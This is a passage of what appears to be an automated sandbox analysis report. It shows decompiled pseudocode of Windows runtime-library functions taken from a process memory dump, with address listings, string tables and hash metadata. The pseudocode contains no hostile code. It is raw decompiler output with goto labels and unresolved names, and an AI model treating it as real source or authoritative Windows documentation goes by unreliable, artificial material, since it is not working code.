													_t114 = E03768938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E036CB150();
													}
													_t116 = E03766D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E036D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x37b8638; // 0x0
																	_t122 = L036D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E036D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E036D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L036FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L036D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E036FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E036FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E036FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E036FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E036FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x37b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x37b7b84 = _t75;
						_t73 = E036DEB70(_t134, 0x37b7b60);
						if( *0x37b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E036DFF60( *0x37b7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                      0x036ffab0
                                      0x036ffab2
                                      0x036ffab3
                                      0x036ffab4
                                      0x036ffabc
                                      0x036ffac0
                                      0x036ffb14
                                      0x036ffb17
                                      0x036ffac2
                                      0x036ffac8
                                      0x036ffacd
                                      0x036ffad3
                                      0x036ffad3
                                      0x036ffadd
                                      0x036ffb18
                                      0x036ffb1b
                                      0x036ffb1d
                                      0x036ffb1e
                                      0x036ffb1f
                                      0x036ffb20
                                      0x036ffb21
                                      0x036ffb22
                                      0x036ffb23
                                      0x036ffb24
                                      0x036ffb25
                                      0x036ffb26
                                      0x036ffb27
                                      0x036ffb28
                                      0x036ffb29
                                      0x036ffb2a
                                      0x036ffb2b
                                      0x036ffb2c
                                      0x036ffb2d
                                      0x036ffb2e
                                      0x036ffb2f
                                      0x036ffb3a
                                      0x036ffb3b
                                      0x036ffb3e
                                      0x036ffb41
                                      0x036ffb44
                                      0x036ffb47
                                      0x036ffb4a
                                      0x036ffb4d
                                      0x036ffb53
                                      0x0373bdcb
                                      0x0373bdcb
                                      0x036ffb59
                                      0x036ffb5b
                                      0x036ffb5b
                                      0x036ffb5e
                                      0x0373bdd5
                                      0x0373bdd8
                                      0x00000000
                                      0x0373bdda
                                      0x00000000
                                      0x0373bdda
                                      0x036ffb64
                                      0x036ffb64
                                      0x036ffb64
                                      0x036ffb67
                                      0x036ffb6e
                                      0x036ffb70
                                      0x036ffb72
                                      0x00000000
                                      0x036ffb78
                                      0x036ffb7a
                                      0x036ffb7a
                                      0x036ffb7d
                                      0x036ffb80
                                      0x0373bddf
                                      0x0373bde1
                                      0x00000000
                                      0x0373bde3
                                      0x00000000
                                      0x0373bde3
                                      0x036ffb86
                                      0x036ffb86
                                      0x036ffb86
                                      0x036ffb8b
                                      0x036ffb90
                                      0x036ffb92
                                      0x036ffb94
                                      0x036ffb9a
                                      0x036ffb9b
                                      0x036ffba1
                                      0x0373bde8
                                      0x0373bdeb
                                      0x0373bded
                                      0x0373beb5
                                      0x0373beb5
                                      0x0373bebb
                                      0x0373bebd
                                      0x0373bec3
                                      0x0373bed2
                                      0x0373bedd
                                      0x0373bedd
                                      0x0373beed
                                      0x00000000
                                      0x0373bdf3
                                      0x0373bdfe
                                      0x0373be06
                                      0x0373be0b
                                      0x0373be0d
                                      0x0373be0f
                                      0x0373be14
                                      0x0373be19
                                      0x0373be20
                                      0x0373be25
                                      0x0373be27
                                      0x0373be35
                                      0x0373be39
                                      0x0373be46
                                      0x0373be4f
                                      0x0373be54
                                      0x0373be56
                                      0x0373bef8
                                      0x0373bef8
                                      0x00000000
                                      0x0373be5c
                                      0x0373be5c
                                      0x0373be60
                                      0x00000000
                                      0x0373be66
                                      0x0373be66
                                      0x0373be7f
                                      0x0373be84
                                      0x0373be87
                                      0x0373be89
                                      0x0373be8b
                                      0x0373be99
                                      0x0373be9d
                                      0x0373bea0
                                      0x0373beac
                                      0x0373beaf
                                      0x0373beb1
                                      0x0373beb3
                                      0x0373beb3
                                      0x00000000
                                      0x0373bea2
                                      0x0373bea2
                                      0x00000000
                                      0x0373bea2
                                      0x0373be8d
                                      0x0373be8d
                                      0x0373be92
                                      0x00000000
                                      0x0373be92
                                      0x0373be8b
                                      0x0373be60
                                      0x0373be3b
                                      0x0373be3b
                                      0x0373be3e
                                      0x00000000
                                      0x0373be40
                                      0x0373be40
                                      0x0373be44
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0373be44
                                      0x0373be3e
                                      0x0373be29
                                      0x0373be29
                                      0x00000000
                                      0x0373be29
                                      0x0373be27
                                      0x00000000
                                      0x036ffba7
                                      0x036ffba7
                                      0x036ffbab
                                      0x0373bf02
                                      0x036ffbb1
                                      0x036ffbb1
                                      0x036ffbb8
                                      0x036ffbbd
                                      0x036ffbbd
                                      0x036ffbbf
                                      0x036ffbbf
                                      0x036ffbc5
                                      0x036ffbcb
                                      0x036ffbf8
                                      0x036ffbf8
                                      0x036ffbfa
                                      0x00000000
                                      0x036ffc00
                                      0x036ffc00
                                      0x036ffc03
                                      0x00000000
                                      0x036ffc09
                                      0x036ffc09
                                      0x036ffc0f
                                      0x036ffc15
                                      0x036ffc23
                                      0x036ffc23
                                      0x036ffc25
                                      0x036ffc27
                                      0x036ffc75
                                      0x036ffc7c
                                      0x036ffc84
                                      0x00000000
                                      0x036ffc29
                                      0x036ffc29
                                      0x036ffc2d
                                      0x036ffc30
                                      0x0373bf0f
                                      0x00000000
                                      0x036ffc36
                                      0x036ffc38
                                      0x036ffc3b
                                      0x036ffc41
                                      0x0373bf17
                                      0x0373bf19
                                      0x0373bf48
                                      0x0373bf4b
                                      0x00000000
                                      0x0373bf1b
                                      0x0373bf22
                                      0x0373bf24
                                      0x0373bf26
                                      0x00000000
                                      0x0373bf2c
                                      0x0373bf37
                                      0x0373bf39
                                      0x0373bf3b
                                      0x00000000
                                      0x0373bf41
                                      0x0373bf41
                                      0x0373bf41
                                      0x0373bf41
                                      0x0373bf45
                                      0x00000000
                                      0x0373bf45
                                      0x0373bf3b
                                      0x0373bf26
                                      0x00000000
                                      0x036ffc47
                                      0x036ffc47
                                      0x036ffc49
                                      0x036ffcb2
                                      0x036ffcb4
                                      0x036ffcb6
                                      0x036ffcdc
                                      0x036ffcdc
                                      0x00000000
                                      0x036ffcb8
                                      0x036ffcc3
                                      0x036ffcc5
                                      0x036ffcc7
                                      0x00000000
                                      0x036ffcc9
                                      0x036ffcc9
                                      0x036ffccd
                                      0x00000000
                                      0x036ffccd
                                      0x036ffcc7
                                      0x00000000
                                      0x036ffc4b
                                      0x036ffc4b
                                      0x036ffc4e
                                      0x036ffc4e
                                      0x036ffc51
                                      0x036ffc51
                                      0x036ffc54
                                      0x036ffc5a
                                      0x036ffc5c
                                      0x036ffc5f
                                      0x036ffc61
                                      0x036ffc63
                                      0x036ffc65
                                      0x036ffc67
                                      0x036ffc6e
                                      0x036ffc72
                                      0x036ffc72
                                      0x036ffc72
                                      0x036ffc72
                                      0x036ffc67
                                      0x036ffc61
                                      0x00000000
                                      0x036ffc5a
                                      0x036ffc49
                                      0x036ffc41
                                      0x036ffc30
                                      0x036ffc27
                                      0x036ffc03
                                      0x036ffbcd
                                      0x036ffbd3
                                      0x036ffbd9
                                      0x036ffbdc
                                      0x036ffbde
                                      0x036ffc99
                                      0x036ffc9b
                                      0x036ffc9d
                                      0x036ffcd5
                                      0x036ffcd5
                                      0x036ffc89
                                      0x036ffc89
                                      0x00000000
                                      0x036ffc9f
                                      0x036ffc9f
                                      0x036ffca3
                                      0x00000000
                                      0x036ffca3
                                      0x00000000
                                      0x036ffbe4
                                      0x036ffbe4
                                      0x036ffbe4
                                      0x036ffbe4
                                      0x036ffbe9
                                      0x036ffbf2
                                      0x00000000
                                      0x036ffbf2
                                      0x036ffbde
                                      0x036ffbcb
                                      0x036ffbab
                                      0x036ffc8b
                                      0x036ffc8b
                                      0x036ffc8c
                                      0x036ffb80
                                      0x036ffb72
                                      0x036ffb5e
                                      0x036ffc8d
                                      0x036ffc91
                                      0x036ffadf
                                      0x036ffadf
                                      0x036ffae1
                                      0x036ffae4
                                      0x036ffae7
                                      0x036ffaec
                                      0x036ffaf8
                                      0x036ffb00
                                      0x036ffb07
                                      0x036ffb0f
                                      0x036ffb0f
                                      0x036ffb07
                                      0x00000000
                                      0x036ffaf8
                                      0x036ffadd

                                      Strings
                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0373BE0F
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                      • API String ID: 0-865735534
                                      • Opcode ID: 25482b7da05446f3c8c22784095e6df94f5c51e186d8dd3bf5fa6a3e674f4529
                                      • Instruction ID: 523f90a1b3d5106fc05a7cba749fd5b0353f3afd4eb82e1442f7a47e117cee61
                                      • Opcode Fuzzy Hash: 25482b7da05446f3c8c22784095e6df94f5c51e186d8dd3bf5fa6a3e674f4529
                                      • Instruction Fuzzy Hash: DDA1EF35A017168FDB25DF68C450B7AB3B9AF4A710F0845ADEA46DF791EB34D802CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036C2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 63%
                                      			E036C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x37b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x37b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E037097C0();
				}
				if( *0x37b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x37b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E036F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E036E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0375FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03709520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E036FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0371DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x37b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x37b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03709980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E037095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E036E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E036E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03747016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0375FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x37b5350;
							if(_t109 != 0x37b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0375FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03755720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                      0x036c2d8a
                                      0x036c2d8a
                                      0x036c2d92
                                      0x036c2d96
                                      0x036c2d9e
                                      0x036c2da0
                                      0x036c2da3
                                      0x036c2da5
                                      0x036c2da8
                                      0x036c2dab
                                      0x036c2db2
                                      0x0371f9aa
                                      0x0371f9ab
                                      0x0371f9ae
                                      0x0371f9ae
                                      0x036c2db8
                                      0x036c2dc2
                                      0x0371f9b9
                                      0x0371f9be
                                      0x0371f9bf
                                      0x0371f9bf
                                      0x036c2dcf
                                      0x0371f9c9
                                      0x036c2dd5
                                      0x036c2dd5
                                      0x036c2dd5
                                      0x036c2dde
                                      0x036c2de1
                                      0x036c2e70
                                      0x036c2e72
                                      0x036c2e72
                                      0x036c2de7
                                      0x036c2deb
                                      0x036c2e7c
                                      0x036c2e83
                                      0x036c2e85
                                      0x036c2e8b
                                      0x036c2e8d
                                      0x036c2e92
                                      0x036c2e92
                                      0x036c2e85
                                      0x036c2df1
                                      0x036c2df7
                                      0x036c2df9
                                      0x036c2df9
                                      0x036c2dfc
                                      0x036c2dff
                                      0x036c2e02
                                      0x00000000
                                      0x036c2e05
                                      0x036c2e0c
                                      0x0371f9d9
                                      0x036c2e12
                                      0x036c2e12
                                      0x036c2e12
                                      0x036c2e1a
                                      0x0371f9e3
                                      0x0371f9e9
                                      0x0371f9f0
                                      0x0371f9f6
                                      0x0371f9f8
                                      0x0371f9f8
                                      0x0371f9f0
                                      0x036c2e23
                                      0x0371fa02
                                      0x0371fa03
                                      0x0371fa05
                                      0x0371fa06
                                      0x00000000
                                      0x036c2e29
                                      0x036c2e29
                                      0x036c2e2e
                                      0x036c2e34
                                      0x036c2e3e
                                      0x00000000
                                      0x00000000
                                      0x036c2e44
                                      0x036c2e47
                                      0x036c2e4d
                                      0x00000000
                                      0x00000000
                                      0x036c2e4f
                                      0x036c2e54
                                      0x00000000
                                      0x00000000
                                      0x036c2e5a
                                      0x036c2e5f
                                      0x036c2e9a
                                      0x036c2ea4
                                      0x036c2ea5
                                      0x036c2ea8
                                      0x036c2eaf
                                      0x036c2eb2
                                      0x036c2eb5
                                      0x0371fae9
                                      0x0371faeb
                                      0x0371faed
                                      0x0371faef
                                      0x0371faf7
                                      0x0371faf8
                                      0x0371fafd
                                      0x0371faff
                                      0x0371fb04
                                      0x0371fb04
                                      0x0371faff
                                      0x036c2ec0
                                      0x036c2ec4
                                      0x036c2ec6
                                      0x036c2ec8
                                      0x0371fb14
                                      0x0371fb18
                                      0x0371fb1e
                                      0x0371fb21
                                      0x0371fb21
                                      0x036c2ece
                                      0x036c2ece
                                      0x036c2ece
                                      0x036c2ed7
                                      0x036c2e61
                                      0x036c2e63
                                      0x0371fa6b
                                      0x0371fa71
                                      0x0371fa76
                                      0x0371fa78
                                      0x0371fa8a
                                      0x0371fa7a
                                      0x0371fa83
                                      0x0371fa83
                                      0x0371fa8f
                                      0x0371fa91
                                      0x0371fa97
                                      0x0371fa9d
                                      0x0371faa4
                                      0x0371faaa
                                      0x0371faaf
                                      0x0371fab1
                                      0x0371fac3
                                      0x0371fab3
                                      0x0371fabc
                                      0x0371fabc
                                      0x0371fac8
                                      0x0371facb
                                      0x0371fadf
                                      0x0371fadf
                                      0x0371facb
                                      0x0371faa4
                                      0x0371fa91
                                      0x036c2e6f
                                      0x036c2e6f
                                      0x036c2e5f
                                      0x0371fa13
                                      0x0371fa15
                                      0x0371fa17
                                      0x0371fa1f
                                      0x0371fa21
                                      0x0371fa22
                                      0x0371fa25
                                      0x0371fa28
                                      0x0371fa2f
                                      0x0371fa2f
                                      0x0371fa2a
                                      0x0371fa2a
                                      0x0371fa2a
                                      0x0371fa31
                                      0x0371fa34
                                      0x0371fa36
                                      0x0371fa3c
                                      0x0371fa3e
                                      0x0371fa41
                                      0x0371fa43
                                      0x0371fa45
                                      0x0371fa45
                                      0x0371fa41
                                      0x0371fa3c
                                      0x0371fa4a
                                      0x0371fa4f
                                      0x0371fa51
                                      0x0371fa53
                                      0x0371fa56
                                      0x0371fa5b
                                      0x0371fa5e
                                      0x00000000
                                      0x0371fa5e
                                      0x036c2e23

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Re-Waiting
                                      • API String ID: 0-316354757
                                      • Opcode ID: b63d661fec8474ce52f5f55c4cb8aa2a61fd0552f29f578b7d7a6868ee37122e
                                      • Instruction ID: 6f9b8b6cf158f4c966a6ae7dbf6d8b18ff0c8893fcdca7bac309f769f1643492
                                      • Opcode Fuzzy Hash: b63d661fec8474ce52f5f55c4cb8aa2a61fd0552f29f578b7d7a6868ee37122e
                                      • Instruction Fuzzy Hash: BF611632A00784DFDB21DF6CC8A4B7EB7B5EB49710F180AADD911AB2C1C774A9418791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03790EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E03790EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0378FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03791074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03709730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0378A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0378A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x37b8b04 >> 0x14) + (_v44 -  *0x37b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E036E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0378138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E036E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0377FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x37b8724 & 0x00000008) != 0) {
						E037852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E037915B5(0x37b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                      0x03790eb7
                                      0x03790eb9
                                      0x03790ec0
                                      0x03790ec2
                                      0x03790ecd
                                      0x0379105b
                                      0x0379105b
                                      0x03791061
                                      0x03791066
                                      0x03791066
                                      0x0379106b
                                      0x03791073
                                      0x03791073
                                      0x03790ed3
                                      0x03790ed6
                                      0x03790edc
                                      0x03790ee0
                                      0x03790ee7
                                      0x03790ef0
                                      0x03790ef5
                                      0x03790efa
                                      0x03790efc
                                      0x03790efd
                                      0x03790f03
                                      0x03790f04
                                      0x03790f06
                                      0x03790f07
                                      0x03790f09
                                      0x03790f0e
                                      0x03790f14
                                      0x03790f23
                                      0x03790f2d
                                      0x03790f34
                                      0x03790f34
                                      0x03790f14
                                      0x03790f52
                                      0x00000000
                                      0x00000000
                                      0x03790f58
                                      0x03790f73
                                      0x03790f74
                                      0x03790f79
                                      0x03790f7d
                                      0x03790f80
                                      0x03790f86
                                      0x03790fab
                                      0x03790fb5
                                      0x03790fc6
                                      0x03790fd1
                                      0x03790fe3
                                      0x03790fd3
                                      0x03790fdc
                                      0x03790fdc
                                      0x03790feb
                                      0x03791009
                                      0x03791009
                                      0x03791015
                                      0x03791027
                                      0x03791017
                                      0x03791020
                                      0x03791020
                                      0x0379102f
                                      0x0379103c
                                      0x0379103c
                                      0x03791048
                                      0x03791050
                                      0x03791050
                                      0x03791055
                                      0x00000000
                                      0x03791055
                                      0x03790f88
                                      0x03790f9e
                                      0x03790fa2
                                      0x03790fa9
                                      0x00000000
                                      0x00000000
                                      0x00000000
